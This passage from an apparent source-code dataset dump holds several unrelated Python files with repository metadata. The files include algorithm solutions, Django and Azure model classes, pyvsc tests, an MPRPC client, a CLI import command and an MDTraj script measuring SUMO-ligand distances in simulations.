# 2. s[i-1] 和 s[i-2] 合体,前提是 s[i-2] != '0' 并且 1 <= int(s[i-2]) * 10 + int(s[i-1]) <= 26,则 dp[i] = dp[i-2]
# 两者之和就是最终 dp[i] 的值
# base case: dp[0] = 1, 表示空字符串也算是一种解码方法
# 另外由于 dp[i] 只依赖于 dp[i-1] 和 dp[i-2],所以可以压缩 dp 数组,只用 3 个变量即可
class Solution:
def numDecodings(self, s: str) -> int:
dp = [0 for _ in range(len(s)+1)]
dp[0] = 1
for i in range(1, len(s)+1):
x = 0
if 1 <= int(s[i-1]) <= 9:
x = dp[i-1]
if s[i-2] != '0' and 1 <= int(s[i-2])*10 + int(s[i-1]) <= 26:
x += dp[i-2]
dp[i] = x
return dp[len(s)]
if __name__ == '__main__':
s = '12'
print(Solution().numDecodings(s)) | [
"[email protected]"
] | |
6ffabdb437b2f0229262f2a7b57b5eb2b66df757 | beb12cce69e21804a9ec4d64062bf6bb062261aa | /bin/EAFP.py | 74646c34e932b3821298f5c393f4bebacf076c1c | [] | no_license | voyeg3r/dotfaster | f7a0cad32ea3420417cd728be24a58533cb907fa | 90c4f1ec4471668fec1f4db755158058fb533be2 | refs/heads/master | 2021-01-02T22:49:47.246952 | 2018-06-02T20:56:58 | 2018-06-02T20:56:58 | 99,405,357 | 5 | 2 | null | null | null | null | UTF-8 | Python | false | false | 678 | py | #!/usr/bin/env python3
# # -*- coding: UTF-8 -*-"
# ------------------------------------------------
# Creation Date: 23-03-2017
# Last Change: ter 29 nov 2016 09:21:52 BRT
# File: EAFP.py
# author: sergio luiz araujo silva
# site: http://vivaotux.blogspot.com
# twitter: @voyeg3r
# ------------------------------------------------
'''
This script attempts to show the concept of:
It is easyer to ask forgiveness than permission
'''
person = {'name': 'Jess', 'age': 23, 'job': 'Programmer'}
try:
print("I'm {name}. I'm {age} years old and I'm {job}".format(**person))
except KeyError as e:
print(f"Missing {e} key")
| [
"[email protected]"
] | |
0876651216fe8d66b6ac1486bdb463a7eb6bcf0b | b37b62a73a14ed3904ffed1db99dafe01bc9eca3 | /app/list/models.py | 3c3e2f812571158f337b54618fddebb78ef4c17e | [] | no_license | gambler1541/django-pagination | d340d7ce3186f801ce1cf4aadb59ee77bd52e9d6 | 44c32be793c0bd2332f29ba5422205ccf0c2d2b8 | refs/heads/master | 2020-04-16T22:56:16.565405 | 2019-01-16T06:59:51 | 2019-01-16T06:59:51 | 165,990,830 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 146 | py | from django.db import models
from django.views.generic import ListView
class Constacts(models.Model):
text = models.TextField(default='')
| [
"[email protected]"
] | |
fb20a737b4b3bc2e0a86a1ea9b5a7945456c6851 | dacdebab897f9287f37a2e85c5705a926ddd36aa | /tests/test_issue930/Snakefile | 06cbf60fd181788b35dd44ff28d8bc6855f13952 | [
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | snakemake/snakemake | 5d4528193d87786d7b372ca7653ece302ff46965 | 27b224ed12448df8aebc7d1ff8f25e3bf7622232 | refs/heads/main | 2023-09-02T08:37:04.323976 | 2023-08-11T10:02:34 | 2023-08-11T10:02:34 | 212,840,200 | 1,941 | 536 | MIT | 2023-09-11T09:51:44 | 2019-10-04T14:58:11 | HTML | UTF-8 | Python | false | false | 646 | samples = ["0","1"]
rule all:
input:
"test.out"
rule build_index:
output:
"large_reference_index"
shell:
"touch {output}"
rule a:
output:
"a/{sample}.out"
group:
"sample_group"
shell:
"touch {output}"
rule b:
input:
rules.a.output,
rules.build_index.output
output:
"b/{sample}.out"
group:
"sample_group"
shell:
"touch {output}"
rule c:
input:
expand("a/{sample}.out", sample=samples),
expand("b/{sample}.out", sample=samples)
output:
"test.out"
shell:
"touch {output}"
| [
"[email protected]"
] | ||
25ed4fc80f15bd27a6243626cc74db6d6f20abe2 | 8bb3bcf914860c20fb4a7163a8e0691cd802dd65 | /ve/unit/test_list_object.py | df090cc057e76b5308629ac65f3383056bb0ac50 | [
"Apache-2.0"
] | permissive | nitinm694/pyvsc | 8586cc2497f336289fecbfeb9e6dd788f4070b60 | 612de9e6244c685a3df1972e4860abfe35b614e1 | refs/heads/master | 2023-07-28T01:49:10.917496 | 2021-09-12T19:06:00 | 2021-09-12T19:06:00 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,362 | py | '''
Created on Jun 20, 2020
@author: ballance
'''
import vsc
from vsc_test_case import VscTestCase
from vsc.visitors.model_pretty_printer import ModelPrettyPrinter
class TestListObject(VscTestCase):
def test_smoke(self):
@vsc.randobj
class item_c(object):
def __init__(self):
self.a = vsc.rand_uint8_t()
self.b = vsc.rand_uint8_t()
@vsc.randobj
class container_c(object):
def __init__(self):
self.l = vsc.rand_list_t(item_c())
for i in range(10):
self.l.append(item_c())
c = container_c()
c.randomize()
for i,it in enumerate(c.l):
print("Item[" + str(i) + "] a=" + str(it.a) + " b=" + str(it.b))
def test_constraints(self):
@vsc.randobj
class item_c(object):
def __init__(self):
self.a = vsc.rand_uint8_t()
self.b = vsc.rand_uint8_t()
@vsc.randobj
class container_c(object):
def __init__(self):
self.l = vsc.rand_list_t(item_c())
for i in range(10):
self.l.append(item_c())
@vsc.constraint
def all_eq_c(self):
with vsc.foreach(self.l) as it:
it.a == it.b
c = container_c()
for i in range(100):
c.randomize()
for it in c.l:
self.assertEqual(it.a, it.b)
def test_init_array_block(self):
@vsc.randobj
class item_c(object):
def __init__(self):
self.a = vsc.rand_uint8_t()
self.b = vsc.rand_uint8_t()
@vsc.randobj
class container_c(object):
def __init__(self):
self.l = vsc.rand_list_t(item_c())
for i in range(10):
self.l.append(item_c())
@vsc.constraint
def all_eq_c(self):
with vsc.foreach(self.l, it=True,idx=True) as (idx,it):
with vsc.if_then((idx&1) == 0):
it.a < it.b
with vsc.else_then:
it.a > it.b
c = container_c()
for i in range(100):
c.randomize()
self.assertEqual(10, len(c.l))
for i,it in enumerate(c.l):
if (i%2) == 0:
self.assertLess(it.a, it.b)
else:
self.assertGreater(it.a, it.b)
def test_diff_classes(self):
@vsc.randobj
class item_c(object):
def __init__(self):
self.a = vsc.rand_uint8_t()
self.b = vsc.rand_uint8_t()
@vsc.randobj
class item_c_1(item_c):
def __init__(self):
super().__init__()
@vsc.constraint
def a_lt_b_c(self):
self.a < self.b
@vsc.randobj
class item_c_2(item_c):
def __init__(self):
super().__init__()
@vsc.constraint
def a_gt_b_c(self):
self.a > self.b
@vsc.randobj
class container_c(object):
def __init__(self):
self.l = vsc.rand_list_t(item_c())
for i in range(10):
if i%2 == 0:
self.l.append(item_c_1())
else:
self.l.append(item_c_2())
c = container_c()
print("Model: " + ModelPrettyPrinter.print(c.get_model()))
for i in range(100):
c.randomize()
self.assertEqual(10, len(c.l))
for i,it in enumerate(c.l):
if i%2 == 0:
self.assertLess(it.a, it.b)
else:
self.assertGreater(it.a, it.b)
| [
"[email protected]"
] | |
8083d6ab3311a0ec517636a91fd33a22445421bd | 7fa15c4dbca224aed616e76074bf017699af00df | /examples/sum_client.py | 0011bc63474cfec50e1d633ae091f99a0ddb1f0e | [
"Apache-2.0"
] | permissive | studio-ousia/mprpc | cc272e650b46a21997c680cf00e5ccbc015dc709 | 6076f68a16f78e0010307344afa253e0956f2a9d | refs/heads/master | 2023-01-14T02:33:22.171728 | 2022-12-27T07:13:23 | 2022-12-27T07:13:23 | 13,551,567 | 170 | 60 | NOASSERTION | 2023-02-18T15:15:10 | 2013-10-14T03:15:41 | Cython | UTF-8 | Python | false | false | 595 | py | # -*- coding: utf-8 -*-
import gsocketpool.pool
import gevent.pool
from mprpc import RPCClient, RPCPoolClient
def call():
client = RPCClient('127.0.0.1', 6000)
print client.call('sum', 1, 2)
def call_using_pool():
options = dict(host='127.0.0.1', port=6000)
client_pool = gsocketpool.pool.Pool(RPCPoolClient, options)
def _call(n):
with client_pool.connection() as client:
return client.call('sum', 1, 2)
glet_pool = gevent.pool.Pool(10)
print [result for result in glet_pool.imap_unordered(_call, xrange(10))]
call()
call_using_pool()
| [
"[email protected]"
] | |
530d9a1a9c81e48861a573078a5fcca53d28e741 | e4ec5b6cf3cfe2568ef0b5654c019e398b4ecc67 | /azure-cli/2.0.18/libexec/lib/python3.6/site-packages/azure/mgmt/network/v2017_06_01/models/network_interface_association.py | 56f1d3b0eda3f4acd5b0007f57df14bfd8f42f49 | [] | no_license | EnjoyLifeFund/macHighSierra-cellars | 59051e496ed0e68d14e0d5d91367a2c92c95e1fb | 49a477d42f081e52f4c5bdd39535156a2df52d09 | refs/heads/master | 2022-12-25T19:28:29.992466 | 2017-10-10T13:00:08 | 2017-10-10T13:00:08 | 96,081,471 | 3 | 1 | null | 2022-12-17T02:26:21 | 2017-07-03T07:17:34 | null | UTF-8 | Python | false | false | 1,281 | py | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class NetworkInterfaceAssociation(Model):
"""Network interface and its custom security rules.
Variables are only populated by the server, and will be ignored when
sending a request.
:ivar id: Network interface ID.
:vartype id: str
:param security_rules: Collection of custom security rules.
:type security_rules: list of :class:`SecurityRule
<azure.mgmt.network.v2017_06_01.models.SecurityRule>`
"""
_validation = {
'id': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'security_rules': {'key': 'securityRules', 'type': '[SecurityRule]'},
}
def __init__(self, security_rules=None):
self.id = None
self.security_rules = security_rules
| [
"[email protected]"
] | |
40704cee49a3949e9dcf543e0695bacb829c017f | e885c02621101ea646c9dcc3e934dd7ceaaf4f04 | /djangocms_disqus/migrations/0001_initial.py | 7be273f44c0b09ed5f6447a8d57db12cadbb0691 | [
"BSD-3-Clause"
] | permissive | mishbahr/djangocms-disqus | 40421d6662ef911542287fc0c2e8b81a63e49667 | 49e75a024e2ca1c932a8b9134500c2f24137a153 | refs/heads/master | 2023-01-05T00:46:39.514178 | 2017-05-23T22:15:12 | 2017-05-23T22:15:12 | 42,411,019 | 21 | 5 | BSD-3-Clause | 2022-12-26T19:52:38 | 2015-09-13T20:07:18 | Python | UTF-8 | Python | false | false | 1,804 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
from connected_accounts.fields import AccountField
from ..conf import settings
class Migration(migrations.Migration):
dependencies = [
('connected_accounts', '__latest__'),
('cms', '__latest__'),
]
operations = [
migrations.CreateModel(
name='Disqus',
fields=[
('cmsplugin_ptr', models.OneToOneField(parent_link=True, auto_created=True, primary_key=True, serialize=False, to='cms.CMSPlugin')),
('shortname', models.CharField(help_text='Select a website Or register a new one on the Disqus website. https://disqus.com/admin/signup/', max_length=150, verbose_name='Shortname')),
('enable_sso', models.BooleanField(default=False, help_text='Allows users to log in to Disqus via your site.', verbose_name='Enable Single Sign-On')),
('load_event', models.CharField(default=settings.DJANGOCMS_DISQUS_LOADING_CHOICES[0][0], max_length=100, verbose_name='Load Disqus', choices=settings.DJANGOCMS_DISQUS_LOADING_CHOICES)),
('site_name', models.CharField(help_text='Used for the SSO login button.', max_length=100, verbose_name='Site Name', blank=True)),
('button_text', models.CharField(help_text='By default it will be "Load Comments..."', max_length=100, verbose_name='Button Text', blank=True)),
('account', AccountField(verbose_name='Connected Account', to='connected_accounts.Account', provider='disqus', help_text='Select a connected Disqus account or connect to a new account.')),
],
options={
'abstract': False,
},
bases=('cms.cmsplugin',),
),
]
| [
"[email protected]"
] | |
3a79fc6c3eb34308f2013497b29f90ad59a89e7b | fc85a54686e13e598541df14c472e8aa744e6713 | /petisco/extra/sqlalchemy/sql/mysql/mysql_connection.py | ccf69974f1b0fbfe9c880d72c61912564fc1f72c | [
"MIT"
] | permissive | alice-biometrics/petisco | 63721751cd43e70825b161a5ece535c80d95b6fa | 771ebe5c69dc735b8f373c2e7303d3b4eb655044 | refs/heads/main | 2023-09-01T03:53:23.642042 | 2023-08-25T05:38:42 | 2023-08-25T05:38:42 | 217,555,512 | 42 | 2 | MIT | 2023-09-12T11:06:43 | 2019-10-25T14:48:10 | Python | UTF-8 | Python | false | false | 1,700 | py | import os
MYSQL_DATABASE_DEFAULT = "mysql_test"
class MySqlConnection:
def __init__(
self,
server_name: str,
driver: str,
user: str,
password: str,
host: str,
port: str,
database_name: str,
url: str,
):
self.server_name = server_name
self.driver = driver
self.user = user
self.password = password
self.host = host
self.port = port
self.database_name = database_name
self.url = url
@staticmethod
def create(
server_name: str = "mysql",
driver: str = "pymysql",
user: str = "root",
password: str = "root",
host: str = "mysql",
port: str = "3306",
database_name: str = MYSQL_DATABASE_DEFAULT,
) -> "MySqlConnection":
url = (
f"{server_name}+{driver}://{user}:{password}@{host}:{port}/{database_name}"
)
return MySqlConnection(
server_name, driver, user, password, host, port, database_name, url
)
@staticmethod
def create_local(database_name: str = MYSQL_DATABASE_DEFAULT) -> "MySqlConnection":
return MySqlConnection.create(
host="localhost", port="3307", database_name=database_name
)
@staticmethod
def from_environ() -> "MySqlConnection":
return MySqlConnection.create(
"mysql",
"pymysql",
os.getenv("MYSQL_USER", "root"),
os.getenv("MYSQL_PASSWORD", "root"),
os.getenv("MYSQL_HOST", "mysql"),
os.getenv("MYSQL_PORT", "3306"),
os.getenv("MYSQL_DATABASE", MYSQL_DATABASE_DEFAULT),
)
| [
"[email protected]"
] | |
5e92281f35cff75f5d8fd68958f6faad390bb658 | 1711a28e01e40c0164be23536ff109c428f3dd8c | /SUMO_compound_mdtraj_analysis.py | 6d5a65145a08e70043aae6c8b2f867f060261593 | [] | no_license | sunhuaiyu/mdtraj | adafd4b4408b688f23fed659e8fbaefd4ff1bd42 | d626841025e9f9411e988cee6631edcbf171499d | refs/heads/master | 2020-05-07T20:28:33.381621 | 2019-05-02T00:00:02 | 2019-05-02T00:00:02 | 180,862,388 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,277 | py | import numpy as np
import matplotlib.pyplot as plt
import mdtraj as md
from glob import glob
from multiprocessing import Pool
def SUMO_ligand_dist(tr):
#coordinates for the Cgamma of SUMO1_F36, SUMO2_F31, or SUMO3_F31:
select_str = '(resname==PHE and (resid==15 or resid==30 or resid==17)) and (name==CG)'
atom_ix = tr.topology.select(select_str)[0]
a = tr.xyz[:, atom_ix]
# ligand all atom coordinatess:
lig = tr.atom_slice(tr.topology.select('chainid==1'))
# ligand center of mass:
b = md.compute_center_of_mass(lig)
# distance between K37/K32_CA and ligand center of mass:
return (((a - b) ** 2).sum(1)) ** 0.5
# read trajectory file in HDF5 format (*.h5), compute SUMO_ligand_dist
def name2traj(file_name):
tr = md.load(file_name)
if tr.n_frames > 10000:
tr = tr[::10]
return tr
# given trajectory file name in HDF5 format, plot SUMO_ligand_dist
def plot_dist(traj_name):
plt.plot(SUMO_ligand_dist(name2traj(traj_name)), linewidth=1)
plt.ylim(0, 4.5)
title = traj_name.split('.')[0]
plt.title(title)
plt.savefig(title + '.jpg', dpi=600)
plt.close()
# calculate fraction of frames where the distance is less than a cut-off
compound = ['PHG00686', 'SEW05414', 'HTS12268', 'BTB13496']
compound2traj_name = {i: glob('SUMO1_2uyz_{}_F*_5000ns.h5'.format(i)) for i in compound}
traj_files = sum(list(compound2traj_name.values()))
# traj_dict contains all loaded trajectories
# dist_dict contains all calculated distances;
# accelerate calculation with multiprocessing
def D(file_name):
tr = name2traj(file_name)
d = SUMO_ligand_dist(tr)
return [tr, d]
DD = Pool(48).map(D, traj_files)
traj_dict = {i[0]:i[1][0] for i in zip(traj_files, DD)}
dist_dict = {i[0]:i[1][1] for i in zip(traj_files, DD)}
# distance (nm) threshold
T = 0.7
# calculate the fraction of trajectories with compound at SIM-binding site
for cp in compound:
all_dist = np.array([dist_dict[i] for i in compound2traj_name[cp]]).ravel()
bound_frames, total_frames = sum(all_dist < T), len(all_dist)
fraction = bound_frames/total_frames
print(cp, round(fraction, 3), total_frames//1000)
# plotting: stack all distance plot together for each compound
for cp in compound:
n = len(compound2traj_name[cp])
fig, axs = plt.subplots(nrows=n, ncols=1, sharex=True)
fig.set_figheight(n)
fig.set_figwidth(4)
axs[0].set_title(cp)
for i in np.arange(n):
dc = dist_dict['SUMO1_2uyz_{0}_F{1}_5000ns.h5'.format(cp, i+1)]
bound = dc < T
unbound = np.invert(bound)
length = dc.shape[0]
axs[i].plot(np.arange(length)[unbound], dc[unbound],
'C1.', markersize=0.5, alpha=0.6)
axs[i].plot(np.arange(length)[bound], dc[bound],
'C0.', markersize=0.5, alpha=0.6)
axs[i].set_ylim(0, 4.5)
fig.subplots_adjust(hspace=0)
fig.savefig('SUMO1_2uyz_{}_dist_all_traj.jpg'.format(cp),
dpi=600, bbox_inches='tight')
# extract a centroid frame from each traj ending with significant binding;
# for each compound, superpose all centroids along the SIM-binding pocket
# and save as one pdb file
centroids = {cp:[] for cp in compound}
for cp in compound:
n = len(compound2traj_name[cp])
for i in np.arange(n):
file_name = 'SUMO1_2uyz_{0}_F{1}_5000ns.h5'.format(cp, i+1)
dc = dist_dict[file_name]
bound = dc < T
if sum(bound) > 1000:
tr = traj_dict[file_name][bound]
protein_atoms = tr.topology.select('residue 32 to 56')
compound_atoms = tr.topology.select('chainid==1')
atoms_ix = np.concatenate((protein_atoms, compound_atoms))
tr.superpose(tr, frame=0, atom_indices=atoms_ix)
m = np.empty((tr.n_frames, tr.n_frames)) # rmsd matrix
for i in range(tr.n_frames):
m[i] = md.rmsd(tr, tr, i, atom_indices=atoms_ix)
#compute the centroid frame: the one closest to mean frame
centroid_ix = np.exp(-m/m.std()).sum(1).argmax()
centroids[cp].append(tr[centroid_ix])
print(file_name)
centroids_tr = md.join(centroids[cp])
centroids_tr.superpose(centroids_tr, frame=0, atom_indices=protein_atoms)
centroids_tr.save_pdb('SUMO1_2uyz_{}_bound_centroids.pdb'.format(cp))
# compute RMSD among bound_centroids
from scipy.spatial.distance import squareform
for cp in compound:
tr = md.load('SUMO1_2uyz_{}_bound_centroids.pdb'.format(cp))
m = array([md.rmsd(tr, tr, i, atom_indices=protein_atoms) for i in range(len(tr))])
m = squareform(m, checks=False)
print(cp, min(m), max(m))
# compute atomic distances
T = 0.7
tr2uyz = md.join([md.load('SUMO1_2uyz_{}_400ns.h5'.format(i+1)) for i in range(12)])
cp = 'PHG00686'
d = [dist_dict['SUMO1_2uyz_{0}_F{1}_5000ns.h5'.format(cp, i+1)] for i in range(12)]
tr1cp = md.join([traj_dict['SUMO1_2uyz_{0}_F{1}_5000ns.h5'.format(cp, i+1)][d[i] < T] for i in range(12)])
def atom_pair_dist3(cp, pair='F36CG_R54CZ'):
top = tr2uyz[0].topology
s = pair.split('_')
pair_ix = top.select_pairs('residue=={0} and name=={1}'.format(s[0][1:3], s[0][3:]),
'residue=={0} and name=={1}'.format(s[1][1:3], s[1][3:]))
dist2uyz = md.compute_distances(tr2uyz, atom_pairs=pair_ix, periodic=False)
dist1cp = md.compute_distances(tr1cp, atom_pairs=pair_ix, periodic=False)
fig = plt.figure(figsize=(10, 4.8))
gs = GridSpec(1, 2, width_ratios=[2, 1])
ax0, ax1 = plt.subplot(gs[0]), plt.subplot(gs[1])
ax0.plot(dist2uyz, 'C1.', markersize=1)
ax0.plot(dist1cp, 'C0.', markersize=1, alpha=0.5)
ax0.tick_params(labelsize=15)
ax1.hist(dist2uyz, color='C1', bins=100, linewidth=1,
orientation='horizontal')
ax1.hist(dist1cp, color='C0', alpha=0.6, bins=100, linewidth=1,
orientation='horizontal')
ax1.tick_params(labelsize=15)
ax1.legend(['no compound', 'with {}'.format(cp)], fontsize=15, frameon=0)
fig.tight_layout()
fig.savefig('SUMO1_2uyz_{0}_dist_{1}.jpg'.format(cp, pair), dpi=600)
| [
"[email protected]"
] | |
47b910274ca6546bd96488e2c3027896b833a188 | 7abd8bbbba8f401c4ce9d9ec550a0cae4a6f19ed | /bingads/v12/bulk/entities/__init__.py | afc5d3d8bf175347a50c466420cd874f00447f89 | [
"MIT"
] | permissive | stevenblanton/BingAds-Python-SDK | fd2f119db51e1a91962aa5ee4bb86344e58078a8 | 5b6e6499ae1dcc6fb8ba3032ad1a2b6ee63705c9 | refs/heads/master | 2020-09-05T12:11:04.168580 | 2019-11-01T15:49:08 | 2019-11-01T15:49:08 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 909 | py | __author__ = 'Bing Ads SDK Team'
__email__ = '[email protected]'
from .common import *
from .bulk_error import *
from .bulk_entity import *
from .bid_suggestion_data import *
from .unknown_bulk_entity import *
from .bulk_account import *
from .bulk_budget import *
from .bulk_campaign import *
from .bulk_ad_group import *
from .bulk_keyword import *
from .bulk_campaign_product_scope import *
from .bulk_ad_group_product_partition import *
from .bulk_campaign_negative_dynamic_search_ad_target import *
from .bulk_ad_group_dynamic_search_ad_target import *
from .bulk_ad_group_negative_dynamic_search_ad_target import *
from .ad_extensions import *
from .bulk_ads import *
from .bulk_negative_keywords import *
from .bulk_negative_sites import *
from .audiences import *
from .target_criterions import *
from .labels import *
from .bulk_offline_conversion import *
from .bulk_experiment import *
| [
"[email protected]"
] | |
61a49f9ce140730c3fb6b664ca5ac5bc8085cfb0 | 6fa701cdaa0d83caa0d3cbffe39b40e54bf3d386 | /google/ads/googleads/v6/googleads-py/google/ads/googleads/v6/services/types/media_file_service.py | d18d6a8d09b03c92f8310398e3c6a6a1be1ac137 | [
"Apache-2.0"
] | permissive | oltoco/googleapis-gen | bf40cfad61b4217aca07068bd4922a86e3bbd2d5 | 00ca50bdde80906d6f62314ef4f7630b8cdb6e15 | refs/heads/master | 2023-07-17T22:11:47.848185 | 2021-08-29T20:39:47 | 2021-08-29T20:39:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,355 | py | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import proto # type: ignore
from google.ads.googleads.v6.enums.types import response_content_type as gage_response_content_type
from google.ads.googleads.v6.resources.types import media_file as gagr_media_file
from google.rpc import status_pb2 # type: ignore
__protobuf__ = proto.module(
package='google.ads.googleads.v6.services',
marshal='google.ads.googleads.v6',
manifest={
'GetMediaFileRequest',
'MutateMediaFilesRequest',
'MediaFileOperation',
'MutateMediaFilesResponse',
'MutateMediaFileResult',
},
)
class GetMediaFileRequest(proto.Message):
r"""Request message for
[MediaFileService.GetMediaFile][google.ads.googleads.v6.services.MediaFileService.GetMediaFile]
Attributes:
resource_name (str):
Required. The resource name of the media file
to fetch.
"""
resource_name = proto.Field(
proto.STRING,
number=1,
)
class MutateMediaFilesRequest(proto.Message):
r"""Request message for
[MediaFileService.MutateMediaFiles][google.ads.googleads.v6.services.MediaFileService.MutateMediaFiles]
Attributes:
customer_id (str):
Required. The ID of the customer whose media
files are being modified.
operations (Sequence[google.ads.googleads.v6.services.types.MediaFileOperation]):
Required. The list of operations to perform
on individual media file.
partial_failure (bool):
If true, successful operations will be
carried out and invalid operations will return
errors. If false, all operations will be carried
out in one transaction if and only if they are
all valid. Default is false.
validate_only (bool):
If true, the request is validated but not
executed. Only errors are returned, not results.
response_content_type (google.ads.googleads.v6.enums.types.ResponseContentTypeEnum.ResponseContentType):
The response content type setting. Determines
whether the mutable resource or just the
resource name should be returned post mutation.
"""
customer_id = proto.Field(
proto.STRING,
number=1,
)
operations = proto.RepeatedField(
proto.MESSAGE,
number=2,
message='MediaFileOperation',
)
partial_failure = proto.Field(
proto.BOOL,
number=3,
)
validate_only = proto.Field(
proto.BOOL,
number=4,
)
response_content_type = proto.Field(
proto.ENUM,
number=5,
enum=gage_response_content_type.ResponseContentTypeEnum.ResponseContentType,
)
class MediaFileOperation(proto.Message):
r"""A single operation to create media file.
Attributes:
create (google.ads.googleads.v6.resources.types.MediaFile):
Create operation: No resource name is
expected for the new media file.
"""
create = proto.Field(
proto.MESSAGE,
number=1,
oneof='operation',
message=gagr_media_file.MediaFile,
)
class MutateMediaFilesResponse(proto.Message):
r"""Response message for a media file mutate.
Attributes:
partial_failure_error (google.rpc.status_pb2.Status):
Errors that pertain to operation failures in the partial
failure mode. Returned only when partial_failure = true and
all errors occur inside the operations. If any errors occur
outside the operations (e.g. auth errors), we return an RPC
level error.
results (Sequence[google.ads.googleads.v6.services.types.MutateMediaFileResult]):
All results for the mutate.
"""
partial_failure_error = proto.Field(
proto.MESSAGE,
number=3,
message=status_pb2.Status,
)
results = proto.RepeatedField(
proto.MESSAGE,
number=2,
message='MutateMediaFileResult',
)
class MutateMediaFileResult(proto.Message):
r"""The result for the media file mutate.
Attributes:
resource_name (str):
The resource name returned for successful
operations.
media_file (google.ads.googleads.v6.resources.types.MediaFile):
The mutated media file with only mutable fields after
mutate. The field will only be returned when
response_content_type is set to "MUTABLE_RESOURCE".
"""
resource_name = proto.Field(
proto.STRING,
number=1,
)
media_file = proto.Field(
proto.MESSAGE,
number=2,
message=gagr_media_file.MediaFile,
)
__all__ = tuple(sorted(__protobuf__.manifest))
| [
"bazel-bot-development[bot]@users.noreply.github.com"
] | bazel-bot-development[bot]@users.noreply.github.com |
d827d71d9c05c7c9a359841ae13e780b7c1620e1 | 0e0bd9d0082bf71918db9f6c92c2cefd32fd23bd | /guild/commands/runs_import.py | 354c23dc47578e9820036cf0779f49107bcd69fb | [
"Apache-2.0",
"LicenseRef-scancode-free-unknown"
] | permissive | christabella/guildai | b911d9758296503c431b571dc4696a3690f44b3d | 10d34eb9aa02aa4a374c340e75b5d44d9f3d8a25 | refs/heads/master | 2022-12-17T18:34:45.766299 | 2020-08-31T12:42:25 | 2020-08-31T12:42:25 | 294,189,964 | 0 | 0 | Apache-2.0 | 2020-09-09T18:02:13 | 2020-09-09T18:02:12 | null | UTF-8 | Python | false | false | 2,500 | py | # Copyright 2017-2020 TensorHub, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from __future__ import division
import click
from guild import click_util
from . import runs_support
def _ac_archive(**_kw):
return click_util.completion_dir()
def import_params(fn):
click_util.append_params(
fn,
[
runs_support.runs_arg,
click.Argument(("archive",)),
click.Option(
("-m", "--move"),
help="Move imported runs rather than copy.",
is_flag=True,
),
click.Option(
("--copy-resources",),
help="Copy resources for each imported run.",
is_flag=True,
),
runs_support.all_filters,
click.Option(
("-y", "--yes"), help="Do not prompt before importing.", is_flag=True
),
],
)
assert fn.__click_params__[-1].name == "runs", fn.__click_params__
fn.__click_params__[-1].autocompletion = _ac_archive
return fn
@click.command("import")
@import_params
@click.pass_context
@click_util.use_args
@click_util.render_doc
def import_runs(ctx, args):
"""Import one or more runs from `ARCHIVE`.
`ARCHIVE` must be a directory that contains exported runs. Archive
directories can be created using ``guild export``.
You may use ``guild runs list --archive ARCHIVE`` to view runs in
`ARCHIVE`.
By default, resources are NOT copied with each imported run, but
their links are maintained. To copy resources, use
`--copy-resources`.
**WARNING**: Use `--copy-resources` with care as each imported run
will contain a separate copy of each resource!
{{ runs_support.runs_arg }}
If a `RUN` argument is not specified, ``:`` is assumed (all runs
are selected).
{{ runs_support.all_filters }}
"""
from . import runs_impl
runs_impl.import_(args, ctx)
| [
"[email protected]"
] | |
af0407d686f5be807f2d3d4b938ec56483a3f89e | d6b0bc433b260b5d519d73087d5df46aa516fcdd | /biobb_adapters/pycompss/biobb_amber/pmemd/pmemd_mdrun.py | e94945a6809b7c30cc12c1d92b7e2ea6151423f4 | [
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | bioexcel/biobb_adapters | b5442fe953b90be4e66faf3460b4a88a40e6d448 | 3daa84ba83a7951add017dd0f05dc361aa99dfe5 | refs/heads/master | 2023-08-14T08:46:39.323257 | 2023-08-02T09:05:21 | 2023-08-02T09:05:21 | 157,351,268 | 0 | 2 | Apache-2.0 | 2023-04-01T14:56:43 | 2018-11-13T09:07:36 | Common Workflow Language | UTF-8 | Python | false | false | 3,420 | py | # Python
import os
import sys
import traceback
# Pycompss
from pycompss.api.task import task
from pycompss.api.parameter import FILE_IN, FILE_OUT
from pycompss.api.multinode import multinode
from pycompss.api.constraint import constraint
# Adapters commons pycompss
from biobb_adapters.pycompss.biobb_commons import task_config
# Wrapped Biobb
from biobb_amber.pmemd.pmemd_mdrun import PmemdMDRun # Importing class instead of module to avoid name collision
task_time_out = int(os.environ.get('TASK_TIME_OUT', 0))
computing_nodes = str(os.environ.get('TASK_COMPUTING_NODES', "1"))
computing_units = str(os.environ.get('TASK_COMPUTING_UNITS', "1"))
gpu_units = str(os.environ.get('TASK_GPU_UNITS', "0"))
@constraint(processors=[{'processorType':'CPU', 'computingUnits':computing_units}, {'processorType':'GPU', 'computingUnits':gpu_units}])
@multinode(computing_nodes=computing_nodes)
